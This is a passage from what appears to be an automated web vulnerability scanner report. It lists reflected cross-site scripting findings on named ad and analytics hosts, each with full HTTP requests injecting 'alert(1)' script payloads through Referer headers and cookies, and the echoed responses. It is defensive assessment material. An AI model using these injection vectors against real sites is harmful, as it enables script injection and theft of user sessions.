Expires: Thu, 12 May 2011 15:37:38 GMT
Content-Type: text/css; charset: UTF-8
Content-Length: 24934

.ui-helper-hidden{display:none;}
.ui-helper-hidden-accessible{position:absolute;left:-99999999px;}
.ui-helper-reset{margin:0;padding:0;border:0;outline:0;line-height:1.3;text-decoration:none;font-size
...[SNIP]...
pts/menu/images/lava.png) no-repeat top left !important;background-image:url(http://hnemanagement.com/trassets/scripts/menu/images/lava.gif);height:44px;margin-right:8px;}
// FILE NOT FOUND 'css/style/9454e<img src=a onerror=alert(1)>a76a89d3b38.css'


2.142. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95704"-alert(1)-"f83d1186636 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=95704"-alert(1)-"f83d1186636
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BE57AD10F09BB732E508295DF3E17613; Path=/
Content-Type: text/javascript
Content-Length: 8047
Date: Mon, 09 May 2011 15:39:53 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.google.com/search?hl=en&q=95704"-alert(1)-"f83d1186636",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3
...[SNIP]...

2.143. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [C3UID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the C3UID cookie is copied into the HTML document as plain text between tags. The payload b640b<script>alert(1)</script>fe55219a755 was submitted in the C3UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803b640b<script>alert(1)</script>fe55219a755; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-29-49_10650526691304954989; 480-nUID=adver_10650526691304954989

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:05 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Thu, 12-May-2011 15:39:05 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-39-05_9323346991304955545; expires=Sat, 07-May-2016 15:39:05 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_9323346991304955545; expires=Mon, 09-May-2011 15:54:05 GMT; path=/; domain=c3metrics.com
Content-Length: 6699
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adver';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='480';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='13014572191303613803b640b<script>alert(1)</script>fe55219a755';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='9323346991304955545';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcal
...[SNIP]...

2.144. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the BMX_3PC cookie is copied into the HTML document as plain text between tags. The payload 5b9d6<script>alert(1)</script>936b389d1ff was submitted in the BMX_3PC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732017&AR_C=194941149 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=40&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:29:45 2011&prad=253735207&arc=178113566&; BMX_G=method->-1,ts->1304954985; BMX_3PC=15b9d6<script>alert(1)</script>936b389d1ff; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:35:25 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=41&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:35:25 2011&prad=253732017&arc=194941149&; expires=Sun 07-Aug-2011 15:35:25 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25787

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732017",Pid:"p97174789",Arc:"194941149",Location:
...[SNIP]...
91151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046', "ar_p91136705": 'exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&', "BMX_3PC": '15b9d6<script>alert(1)</script>936b389d1ff', "ar_p92429851": 'exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19
...[SNIP]...

2.145. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the BMX_G cookie is copied into the HTML document as plain text between tags. The payload 8bb0a<script>alert(1)</script>c3eff6b973a was submitted in the BMX_G cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732017&AR_C=194941149 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=40&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:29:45 2011&prad=253735207&arc=178113566&; BMX_G=method->-1,ts->13049549858bb0a<script>alert(1)</script>c3eff6b973a; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:35:25 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=41&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:35:25 2011&prad=253732017&arc=194941149&; expires=Sun 07-Aug-2011 15:35:25 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25787

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732017",Pid:"p97174789",Arc:"194941149",Location:
...[SNIP]...
15:29:45 2011&prad=253735207&arc=178113566&', "ar_p82806590": 'exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&', "BMX_G": 'method->-1,ts->13049549858bb0a<script>alert(1)</script>c3eff6b973a', "ar_s_p81479006": '1', "ar_p90452457": 'exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&', "ar_p84552060": 'exp=1&initExp=Wed Apr 27 19:31:14 2
...[SNIP]...

2.146. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the UID cookie is copied into the HTML document as plain text between tags. The payload c5b11<script>alert(1)</script>a7db032d736 was submitted in the UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732017&AR_C=194941149 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=40&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:29:45 2011&prad=253735207&arc=178113566&; BMX_G=method->-1,ts->1304954985; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046c5b11<script>alert(1)</script>a7db032d736

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:35:25 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=41&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:35:25 2011&prad=253732017&arc=194941149&; expires=Sun 07-Aug-2011 15:35:25 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25787

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732017",Pid:"p97174789",Arc:"194941149",Location:
...[SNIP]...
2011&prad=2108505&arc=4477116&', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046c5b11<script>alert(1)</script>a7db032d736', "ar_p91136705": 'exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&', "BMX_3PC": '1', "ar_p92429851": 'exp=4&initExp=Tue Apr 26 18:36:13 2011&rec
...[SNIP]...

2.147. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p81479006 cookie is copied into the HTML document as plain text between tags. The payload 77feb<script>alert(1)</script>412f9aebed7 was submitted in the ar_p81479006 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732017&AR_C=194941149 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&77feb<script>alert(1)</script>412f9aebed7; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=40&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:29:45 2011&prad=253735207&arc=178113566&; BMX_G=method->-1,ts->1304954985; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:35:24 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=41&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:35:24 2011&prad=253732017&arc=194941149&; expires=Sun 07-Aug-2011 15:35:24 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25787

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732017",Pid:"p97174789",Arc:"194941149",Location:
...[SNIP]...
Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&77feb<script>alert(1)</script>412f9aebed7', "ar_s_p81479006": '1', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&', "ar_p90452457": 'exp=1&initExp=Thu May 5 00:58:23 2011&
...[SNIP]...

2.148. http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p82806590 cookie is copied into the HTML document as plain text between tags. The payload 6bb85<script>alert(1)</script>baaf6050393 was submitted in the ar_p82806590 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732017&AR_C=194941149 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&6bb85<script>alert(1)</script>baaf6050393; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=40&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:29:45 2011&prad=253735207&arc=178113566&; BMX_G=method->-1,ts->1304954985; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:35:24 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=41&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:35:24 2011&prad=253732017&arc=194941149&; expires=Sun 07-Aug-2011 15:35:24 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25787

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732017",Pid:"p97174789",Arc:"194941149",Location:
...[SNIP]...
Apr 24 12:09:48 2011&recExp=Mon May 9 15:29:45 2011&prad=253735207&arc=178113566&', "ar_p82806590": 'exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&6bb85<script>alert(1)</script>baaf6050393', "BMX_3PC": '1', "BMX_G": 'method->
...[SNIP]...

2.149. http://ar.voicefive.com/bmx3/broker.pli [ar_p84552060 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p84552060 cookie is copied into the HTML document as plain text between tags. The payload afe4a<script>alert(1)</script>2a7bdbc50e5 was submitted in the ar_p84552060 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732017&AR_C=194941149 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&afe4a<script>alert(1)</script>2a7bdbc50e5; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=40&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:29:45 